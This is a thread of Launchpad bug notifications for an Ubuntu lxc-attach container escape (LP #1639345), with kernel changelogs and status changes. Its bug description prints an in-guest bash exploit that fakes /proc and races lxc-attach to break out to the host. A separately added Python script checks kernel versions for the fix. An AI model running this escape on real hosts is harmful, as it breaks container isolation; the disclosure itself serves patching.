[Touch-packages] [Bug 1639345] Re: lxc-attach to malicious container allows access to host
This bug was fixed in the package linux - 4.8.0-30.32

---
linux (4.8.0-30.32) yakkety; urgency=low

  * CVE-2016-8655 (LP: #1646318)
    - packet: fix race condition in packet_set_ring

 -- Brad Figg  Thu, 01 Dec 2016 08:02:53 -0800

** Changed in: linux (Ubuntu)
       Status: Triaged => Fix Released

** CVE added: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2016-8655

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to lxc in Ubuntu.
https://bugs.launchpad.net/bugs/1639345

Title:
  lxc-attach to malicious container allows access to host

Status in linux package in Ubuntu:
  Fix Released
Status in lxc package in Ubuntu:
  Fix Released
Status in linux source package in Trusty:
  Fix Released
Status in lxc source package in Trusty:
  Fix Released
Status in linux source package in Vivid:
  Fix Released
Status in lxc source package in Vivid:
  Fix Released
Status in linux source package in Xenial:
  Fix Released
Status in lxc source package in Xenial:
  Fix Released
Status in linux source package in Yakkety:
  Fix Released
Status in lxc source package in Yakkety:
  Fix Released

Bug description:
  A malicious root user in an unprivileged container may interfere with
  lxc-attach to provide manipulated guest proc file system information to
  disable dropping of capabilities and may in the end access the host file
  system by winning a very easy race against lxc-attach.
  In guest sequence:

  cat < /tmp/test
  #!/bin/bash -e
  rm -rf /test || true
  mkdir -p /test/sys/kernel
  echo "proc /proc proc rw,nosuid,nodev,noexec,relatime 0 0" > /test/mounts
  echo 0 > /test/sys/kernel/cap_last_cap
  mkdir -p /test/self
  mknod /test/self/status p
  cd /proc
  mount -o bind /test /proc
  while true; do
    pid=\$(ls -al */exe | grep lxc-attach | sed -r -e 's/.* ([0-9]+)\\/exe ->.*/\\1/')
    if [ "\${pid}" != "" ]; then
      cd /
      umount -i -f -l -n /proc
      exec /LxcAttachEscape "\${pid}" /bin/bash
    fi
    sleep 1
  done
  EOF

  See attachment for LxcAttachEscape.c

  Exploit uses fixed fd=7 for attacking; on other test environments it
  might be another fd.

  Tests were performed by attacking lxc-attach started by
  "screen lxc-attach -n [guestname]", which is the sequence required
  against the TTY-stealing attacks also not fixed in all lxc-attach
  versions.

  In my opinion two bugs might need fixing:
  * lxc-attach should not use untrusted/manipulated information for proceeding
  * kernel should prevent ptracing of lxc-attach as it was created in another USERNS

  # lsb_release -r -d
  Description:    Ubuntu 16.04.1 LTS
  Release:        16.04

  # apt-cache policy lxc1
  lxc1:
    Installed: 2.0.5-0ubuntu1~ubuntu16.04.2
    Candidate: 2.0.5-0ubuntu1~ubuntu16.04.2
    Version table:
   *** 2.0.5-0ubuntu1~ubuntu16.04.2 500
          500 http://debarchive-ehealth.d03.arc.local/ubuntu xenial-updates/main amd64 Packages
          100 /var/lib/dpkg/status
       2.0.0-0ubuntu2 500
          500 http://debarchive-ehealth.d03.arc.local/ubuntu xenial/main amd64 Packages

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1639345/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to     : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp
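A defender-side check, added here and not part of the bug report or of any Ubuntu or LXC tooling: a small Python script that takes a "uname -r" string and reports whether that kernel's ABI is at or past the upload whose changelog carries the ptrace permission fix for this bug. The fixed versions it uses are the ones quoted in the changelogs later in this thread (3.13.0-102.149 for trusty, 3.19.0-75.83 for vivid, 4.4.0-48.69 for xenial, 4.8.0-28.30 for yakkety). It assumes, as those changelogs show, that the ABI number in "uname -r" equals the first part of the package's Debian revision (4.4.0-48.69 runs as 4.4.0-48-generic), and that derivative kernels such as the 4.4.0-1037-snapdragon upload in the xenial changelog number their ABI from 1000 and follow their own sequence; the sample inputs at the bottom are constructed. It covers only the kernel half of the fix; the lxc package version that closed the lxc side is not quoted on this page, so it is not checked.

```python
import re

# Kernel uploads whose changelogs, as quoted in this bug (LP: #1639345),
# carry "mm: Add a user_ns owner to mm_struct and fix ptrace permission
# checks". Uploads with a lower ABI on the same base version predate it.
FIXED_UPLOADS = {
    "trusty":  "3.13.0-102.149",
    "vivid":   "3.19.0-75.83",
    "xenial":  "4.4.0-48.69",
    "yakkety": "4.8.0-28.30",
}

# Package version as written in debian/changelog, e.g. 4.4.0-48.69
_PKG_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)-(\d+)\.(\d+)$")
# Running kernel as printed by `uname -r`, e.g. 4.4.0-48-generic
_UNAME_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)-(\d+)-([a-z0-9-]+)$")

# Assumption (Ubuntu packaging convention): derivative kernels such as the
# 4.4.0-1037-snapdragon upload in the xenial changelog number their ABI
# from 1000 and follow their own sequence, so they cannot be judged here.
_DERIVATIVE_ABI_START = 1000


def parse_package_version(version):
    """'4.4.0-48.69' -> ((4, 4, 0), 48, 69): base version, ABI, upload."""
    m = _PKG_RE.match(version.strip())
    if not m:
        raise ValueError("not an Ubuntu kernel package version: %r" % version)
    major, minor, patch, abi, upload = (int(x) for x in m.groups())
    return (major, minor, patch), abi, upload


def parse_uname_release(release):
    """'4.4.0-48-generic' -> ((4, 4, 0), 48, 'generic')."""
    m = _UNAME_RE.match(release.strip())
    if not m:
        raise ValueError("not an Ubuntu kernel release string: %r" % release)
    major, minor, patch, abi = (int(x) for x in m.groups()[:4])
    return (major, minor, patch), abi, m.group(5)


# Index by kernel base version, not by series name: the kernel actually
# running (an HWE 4.8 kernel on a xenial userspace, say) is what matters.
_FIXED_ABI = {}
for _series, _version in FIXED_UPLOADS.items():
    _base, _abi, _upload = parse_package_version(_version)
    _FIXED_ABI[_base] = (_abi, _series)


def assess_running_kernel(release):
    """Return (verdict, detail) for a `uname -r` string.

    verdict: True  - ABI at or past the upload carrying the fix
             False - ABI predates that upload
             None  - not a kernel this bug's changelogs cover
    """
    base, abi, flavour = parse_uname_release(release)
    base_str = ".".join(str(n) for n in base)
    if abi >= _DERIVATIVE_ABI_START:
        return None, "%s: derivative flavour %s has its own ABI sequence" % (release, flavour)
    if base not in _FIXED_ABI:
        return None, "%s: base %s not covered by the LP: #1639345 changelogs" % (release, base_str)
    fixed_abi, series = _FIXED_ABI[base]
    fixed_version = FIXED_UPLOADS[series]
    if abi >= fixed_abi:
        return True, "%s: ABI %d >= %d, at or past %s %s" % (release, abi, fixed_abi, series, fixed_version)
    return False, "%s: ABI %d < %d, predates %s %s" % (release, abi, fixed_abi, series, fixed_version)


if __name__ == "__main__":
    # Constructed sample inputs; on a live host pass platform.release().
    for sample in ("4.4.0-47-generic", "4.4.0-51-generic", "3.13.0-101-lowlatency",
                   "4.8.0-28-generic", "4.4.0-1037-snapdragon", "4.9.0-1-amd64"):
        print(assess_running_kernel(sample)[1])
```

The check keys on the running kernel's own lineage rather than on the Ubuntu release name, because a xenial host running an HWE kernel must be judged against the yakkety-derived upload, not the 4.4 one; a verdict of None means the host needs a manual look, not that it is safe.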
[Touch-packages] [Bug 1639345] Re: lxc-attach to malicious container allows access to host
This bug was fixed in the package linux - 4.8.0-28.30

---
linux (4.8.0-28.30) yakkety; urgency=low

  [ Luis Henriques ]

  * Release Tracking Bug
    - LP: #1641083

  * lxc-attach to malicious container allows access to host (LP: #1639345)
    - Revert "UBUNTU: SAUCE: (noup) ptrace: being capable wrt a process requires mapped uids/gids"
    - (upstream) mm: Add a user_ns owner to mm_struct and fix ptrace permission checks

  * [Feature] AVX-512 new instruction sets (avx512_4vnniw, avx512_4fmaps) (LP: #1637526)
    - x86/cpufeature: Add AVX512_4VNNIW and AVX512_4FMAPS features

  * zfs: importing zpool with vdev on zvol hangs kernel (LP: #1636517)
    - SAUCE: (noup) Update zfs to 0.6.5.8-0ubuntu4.1

  * Move some device drivers build from kernel built-in to modules (LP: #1637303)
    - [Config] CONFIG_TIGON3=m for all arches
    - [Config] CONFIG_VIRTIO_BLK=m, CONFIG_VIRTIO_NET=m

  * I2C touchpad does not work on AMD platform (LP: #1612006)
    - pinctrl/amd: Configure GPIO register using BIOS settings

  * guest experiencing Transmit Timeouts on CX4 (LP: #1636330)
    - powerpc/64: Re-fix race condition between going idle and entering guest
    - powerpc/64: Fix race condition in setting lock bit in idle/wakeup code

  * QEMU throws failure msg while booting guest with SRIOV VF (LP: #1630554)
    - KVM: PPC: Always select KVM_VFIO, plus Makefile cleanup

  * [Feature] KBL - New device ID for Kabypoint(KbP) (LP: #1591618)
    - SAUCE: mfd: lpss: Fix Intel Kaby Lake PCH-H properties

  * hio: SSD data corruption under stress test (LP: #1638700)
    - SAUCE: hio: set bi_error field to signal an I/O error on a BIO
    - SAUCE: hio: splitting bio in the entry of .make_request_fn

  * cleanup primary tree for linux-hwe layering issues (LP: #1637473)
    - [Config] switch Vcs-Git: to yakkety repository
    - [Packaging] handle both linux-lts* and linux-hwe* as backports
    - [Config] linux-tools-common and linux-cloud-tools-common are one per series
    - [Config] linux-source-* is in the primary linux namespace
    - [Config] linux-tools -- always suggest the base package

  * SRU: sync zfsutils-linux and spl-linux changes to linux (LP: #1635656)
    - SAUCE: (noup) Update spl to 0.6.5.8-2, zfs to 0.6.5.8-0ubuntu4 (LP: #1635656)

  * [Feature] SKX: perf uncore PMU support (LP: #1591810)
    - perf/x86/intel/uncore: Add Skylake server uncore support
    - perf/x86/intel/uncore: Remove hard-coded implementation for Node ID mapping location
    - perf/x86/intel/uncore: Handle non-standard counter offset

  * [Feature] Purley: Memory Protection Keys (LP: #1591804)
    - x86/pkeys: Add fault handling for PF_PK page fault bit
    - mm: Implement new pkey_mprotect() system call
    - x86/pkeys: Make mprotect_key() mask off additional vm_flags
    - x86/pkeys: Allocation/free syscalls
    - x86: Wire up protection keys system calls
    - generic syscalls: Wire up memory protection keys syscalls
    - pkeys: Add details of system call use to Documentation/
    - x86/pkeys: Default to a restrictive init PKRU
    - x86/pkeys: Allow configuration of init_pkru
    - x86/pkeys: Add self-tests

  * kernel invalid opcode in intel_powerclamp (LP: #1630774)
    - SAUCE: (no-up) thermal/powerclamp: correct cpu support check

  * please include mlx5_core modules in linux-image-generic package (LP: #1635223)
    - [Config] Include mlx5 in main package

  * [LTCTest] vfio_pci not loaded on Ubuntu 16.10 by default (LP: #1636733)
    - [Config] CONFIG_VFIO_PCI=y for ppc64el

  * Yakkety update to v4.8.6 stable release (LP: #1638748)
    - drm/vc4: Fix races when the CS reads from render targets.
    - drm/prime: Pass the right module owner through to dma_buf_export()
    - drm/i915/backlight: setup and cache pwm alternate increment value
    - drm/i915/backlight: setup backlight pwm alternate increment on backlight enable
    - drm/amdgpu: fix IB alignment for UVD
    - drm/amdgpu/dce10: disable hpd on local panels
    - drm/amdgpu/dce8: disable hpd on local panels
    - drm/amdgpu/dce11: disable hpd on local panels
    - drm/amdgpu/dce11: add missing drm_mode_config_cleanup call
    - drm/amdgpu: initialize the context reset_counter in amdgpu_ctx_init
    - drm/amdgpu: change vblank_time's calculation method to reduce computational error.
    - drm/radeon: narrow asic_init for virtualization
    - drm/radeon/si/dpm: fix phase shedding setup
    - drm/radeon: change vblank_time's calculation method to reduce computational error.
    - drm/vmwgfx: Limit the user-space command buffer size
    - drm/fsl-dcu: fix endian issue when using clk_register_divider
    - drm/amd/powerplay: fix mclk not switching back after multi-head was disabled
    - HID: add quirk for Akai MIDImix.
    - drm/i915/skl: Update plane watermarks atomically during plane updates
    - drm/i915: Move CRTC updating in atomic_commit into it's own hook
    - drm/i915/skl: Update DDB values atomi
[Touch-packages] [Bug 1639345] Re: lxc-attach to malicious container allows access to host
This bug was fixed in the package linux - 4.4.0-51.72

---
linux (4.4.0-51.72) xenial; urgency=low

  [ Luis Henriques ]

  * Release Tracking Bug
    - LP: #1644611

  * 4.4.0-1037-snapdragon #41: kernel panic on boot (LP: #1644596)
    - Revert "dma-mapping: introduce the DMA_ATTR_NO_WARN attribute"
    - Revert "powerpc: implement the DMA_ATTR_NO_WARN attribute"
    - Revert "nvme: use the DMA_ATTR_NO_WARN attribute"

linux (4.4.0-50.71) xenial; urgency=low

  [ Luis Henriques ]

  * Release Tracking Bug
    - LP: #1644169

  * xenial 4.4.0-49.70 kernel breaks LXD userspace (LP: #1644165)
    - Revert "UBUNTU: SAUCE: (namespace) fuse: Allow user namespace mounts by default"
    - Revert "UBUNTU: SAUCE: (namespace) fs: Don't remove suid for CAP_FSETID for userns root"
    - Revert "(namespace) Revert "UBUNTU: SAUCE: fs: Don't remove suid for CAP_FSETID in s_user_ns""
    - Revert "UBUNTU: SAUCE: (namespace) fs: Allow superblock owner to change ownership of inodes"
    - Revert "(namespace) Revert "UBUNTU: SAUCE: fs: Allow superblock owner to change ownership of inodes with unmappable ids""
    - Revert "UBUNTU: SAUCE: (namespace) security/integrity: Harden against malformed xattrs"
    - Revert "(namespace) Revert "UBUNTU: SAUCE: ima/evm: Allow root in s_user_ns to set xattrs""
    - Revert "(namespace) dquot: For now explicitly don't support filesystems outside of init_user_ns"
    - Revert "(namespace) quota: Handle quota data stored in s_user_ns in quota_setxquota"
    - Revert "(namespace) quota: Ensure qids map to the filesystem"
    - Revert "(namespace) Revert "UBUNTU: SAUCE: quota: Convert ids relative to s_user_ns""
    - Revert "(namespace) Revert "UBUNTU: SAUCE: quota: Require that qids passed to dqget() be valid and map into s_user_ns""
    - Revert "(namespace) vfs: Don't create inodes with a uid or gid unknown to the vfs"
    - Revert "(namespace) vfs: Don't modify inodes with a uid or gid unknown to the vfs"
    - Revert "UBUNTU: SAUCE: (namespace) fuse: Translate ids in posix acl xattrs"
    - Revert "UBUNTU: SAUCE: (namespace) posix_acl: Export posix_acl_fix_xattr_userns() to modules"
    - Revert "(namespace) vfs: Verify acls are valid within superblock's s_user_ns."
    - Revert "(namespace) Revert "UBUNTU: SAUCE: fs: Update posix_acl support to handle user namespace mounts""
    - Revert "(namespace) fs: Refuse uid/gid changes which don't map into s_user_ns"
    - Revert "(namespace) Revert "UBUNTU: SAUCE: fs: Refuse uid/gid changes which don't map into s_user_ns""
    - Revert "(namespace) mnt: Move the FS_USERNS_MOUNT check into sget_userns"

linux (4.4.0-49.70) xenial; urgency=low

  [ Luis Henriques ]

  * Release Tracking Bug
    - LP: #1640921

  * Infiniband driver (kernel module) needed for Azure (LP: #1641139)
    - SAUCE: RDMA Infiniband for Windows Azure
    - [Config] CONFIG_HYPERV_INFINIBAND_ND=m
    - SAUCE: Makefile RDMA infiniband driver for Windows Azure
    - [Config] Add hv_network_direct.ko to generic inclusion list
    - SAUCE: RDMA Infiniband for Windows Azure is dependent on amd64

linux (4.4.0-48.69) xenial; urgency=low

  [ Luis Henriques ]

  * Release Tracking Bug
    - LP: #1640758

  * lxc-attach to malicious container allows access to host (LP: #1639345)
    - Revert "UBUNTU: SAUCE: (noup) ptrace: being capable wrt a process requires mapped uids/gids"
    - (upstream) mm: Add a user_ns owner to mm_struct and fix ptrace permission checks

  * take 'P' command from upstream xmon (LP: #1637978)
    - powerpc/xmon: Add xmon command to dump process/task similar to ps(1)

  * zfs: importing zpool with vdev on zvol hangs kernel (LP: #1636517)
    - SAUCE: (noup) Update zfs to 0.6.5.6-0ubuntu15

  * I2C touchpad does not work on AMD platform (LP: #1612006)
    - pinctrl/amd: Configure GPIO register using BIOS settings
    - pinctrl/amd: switch to using a bool for level

  * [LTCTest] vfio_pci not loaded on Ubuntu 16.10 by default (LP: #1636733)
    - [Config] CONFIG_VFIO_PCI=y for ppc64el

  * QEMU throws failure msg while booting guest with SRIOV VF (LP: #1630554)
    - KVM: PPC: Always select KVM_VFIO, plus Makefile cleanup

  * Allow fuse user namespace mounts by default in xenial (LP: #1634964)
    - (namespace) mnt: Move the FS_USERNS_MOUNT check into sget_userns
    - (namespace) Revert "UBUNTU: SAUCE: fs: Refuse uid/gid changes which don't map into s_user_ns"
    - (namespace) fs: Refuse uid/gid changes which don't map into s_user_ns
    - (namespace) Revert "UBUNTU: SAUCE: fs: Update posix_acl support to handle user namespace mounts"
    - (namespace) vfs: Verify acls are valid within superblock's s_user_ns.
    - SAUCE: (namespace) posix_acl: Export posix_acl_fix_xattr_userns() to modules
    - SAUCE: (namespace) fuse: Translate ids in posix acl xattrs
    - (namespace) vfs: Don't modify inodes with a uid or
[Touch-packages] [Bug 1639345] Re: lxc-attach to malicious container allows access to host
This bug was fixed in the package linux - 3.19.0-75.83

---
linux (3.19.0-75.83) vivid; urgency=low

  [ Luis Henriques ]

  * Release Tracking Bug
    - LP: #1640613

  * lxc-attach to malicious container allows access to host (LP: #1639345)
    - Revert "UBUNTU: ptrace: being capable wrt a process requires mapped uids/gids"
    - (upstream) mm: Add a user_ns owner to mm_struct and fix ptrace permission checks

  * CVE-2016-8658
    - brcmfmac: avoid potential stack overflow in brcmf_cfg80211_start_ap()

  * CVE-2016-7425
    - scsi: arcmsr: Buffer overflow in arcmsr_iop_message_xfer()

 -- Luis Henriques  Wed, 09 Nov 2016 22:48:56 +

** Changed in: linux (Ubuntu Vivid)
       Status: Fix Committed => Fix Released

** Changed in: linux (Ubuntu Xenial)
       Status: Fix Committed => Fix Released

Status in linux package in Ubuntu:
  Triaged
Status in lxc package in Ubuntu:
  Fix Released
Status in linux source package in Trusty:
  Fix Released
Status in lxc source package in Trusty:
  Fix Released
Status in linux source package in Vivid:
  Fix Released
Status in lxc source package in Vivid:
  Fix Released
Status in linux source package in Xenial:
  Fix Released
Status in lxc source package in Xenial:
  Fix Released
Status in linux source package in Yakkety:
  Fix Released
Status in lxc source package in Yakkety:
  Fix Released
[Touch-packages] [Bug 1639345] Re: lxc-attach to malicious container allows access to host
This bug was fixed in the package linux - 3.13.0-103.150

---
linux (3.13.0-103.150) trusty; urgency=low

  [ Luis Henriques ]

  * Release Tracking Bug
    - LP: #1644489

  * Possible regression on 3.13.0-102.149~precise1 x86_64 (gce) (LP: #1644302)
    - SAUCE: apparmor: delete extra variable dev_path

linux (3.13.0-102.149) trusty; urgency=low

  [ Luis Henriques ]

  * Release Tracking Bug
    - LP: #1640581

  * lxc-attach to malicious container allows access to host (LP: #1639345)
    - Revert "UBUNTU: ptrace: being capable wrt a process requires mapped uids/gids"
    - (upstream) mm: Add a user_ns owner to mm_struct and fix ptrace permission checks

  * Syntax error extra parenthesis linux-headers-3.13.0-100/Makefile (LP: #1636625)
    - Makefile: fix extra parenthesis typo when CC_STACKPROTECTOR_REGULAR is enabled

  * Add a driver for Amazon Elastic Network Adapters (ENA) (LP: #1635721)
    - lib/bitmap.c: conversion routines to/from u32 array
    - kernel.h: define u8, s8, u32, etc. limits
    - net: ethtool: add new ETHTOOL_xLINKSETTINGS API
    - PCI/MSI: Add pci_msix_vec_count()
    - etherdevice: Use ether_addr_copy to copy an Ethernet address
    - net: ena: Add a driver for Amazon Elastic Network Adapters (ENA)
    - [config] enable CONFIG_ENA_ETHERNET=m (Amazon ENA driver)

  * CVE-2016-8658
    - brcmfmac: avoid potential stack overflow in brcmf_cfg80211_start_ap()

  * CVE-2016-7425
    - scsi: arcmsr: Buffer overflow in arcmsr_iop_message_xfer()

  * srcname from mount rule corrupted under load (LP: #1634753)
    - SAUCE: apparmor: fix sleep in critical section

  * ghash-clmulni-intel module fails to load (LP: #1633058)
    - crypto: ghash-clmulni - Fix load failure
    - crypto: cryptd - Assign statesize properly

 -- Luis Henriques  Thu, 24 Nov 2016 09:56:54 +

** Changed in: linux (Ubuntu Trusty)
       Status: Fix Committed => Fix Released

** CVE added: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2016-7425

** CVE added: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2016-8658

Status in linux package in Ubuntu:
  Triaged
Status in lxc package in Ubuntu:
  Fix Released
Status in linux source package in Trusty:
  Fix Released
Status in lxc source package in Trusty:
  Fix Released
Status in linux source package in Vivid:
  Fix Released
Status in lxc source package in Vivid:
  Fix Released
Status in linux source package in Xenial:
  Fix Released
Status in lxc source package in Xenial:
  Fix Released
Status in linux source package in Yakkety:
  Fix Committed
Status in lxc source package in Yakkety:
  Fix Released
[Touch-packages] [Bug 1639345] Re: lxc-attach to malicious container allows access to host
** Changed in: linux (Ubuntu)
       Status: Incomplete => Triaged

Status in linux package in Ubuntu:
  Triaged
Status in lxc package in Ubuntu:
  Fix Released
Status in linux source package in Trusty:
  Fix Committed
Status in lxc source package in Trusty:
  Fix Released
Status in linux source package in Vivid:
  Fix Committed
Status in lxc source package in Vivid:
  Fix Released
Status in linux source package in Xenial:
  Fix Committed
Status in lxc source package in Xenial:
  Fix Released
Status in linux source package in Yakkety:
  Fix Committed
Status in lxc source package in Yakkety:
  Fix Released
[Touch-packages] [Bug 1639345] Re: lxc-attach to malicious container allows access to host
** Changed in: linux (Ubuntu)
       Status: Incomplete => New

** Tags added: bot-stop-nagging

Status in linux package in Ubuntu:
  New
Status in lxc package in Ubuntu:
  Fix Released
Status in linux source package in Trusty:
  Fix Committed
Status in lxc source package in Trusty:
  Fix Released
Status in linux source package in Vivid:
  Fix Committed
Status in lxc source package in Vivid:
  Fix Released
Status in linux source package in Xenial:
  Fix Committed
Status in lxc source package in Xenial:
  Fix Released
Status in linux source package in Yakkety:
  Fix Committed
Status in lxc source package in Yakkety:
  Fix Released
[Touch-packages] [Bug 1639345] Re: lxc-attach to malicious container allows access to host
** Information type changed from Private Security to Public Security

Status in linux package in Ubuntu:
  New
Status in lxc package in Ubuntu:
  Fix Released
Status in linux source package in Trusty:
  Fix Committed
Status in lxc source package in Trusty:
  Fix Released
Status in linux source package in Vivid:
  Fix Committed
Status in lxc source package in Vivid:
  Fix Released
Status in linux source package in Xenial:
  Fix Committed
Status in lxc source package in Xenial:
  Fix Released
Status in linux source package in Yakkety:
  Fix Committed
Status in lxc source package in Yakkety:
  Fix Released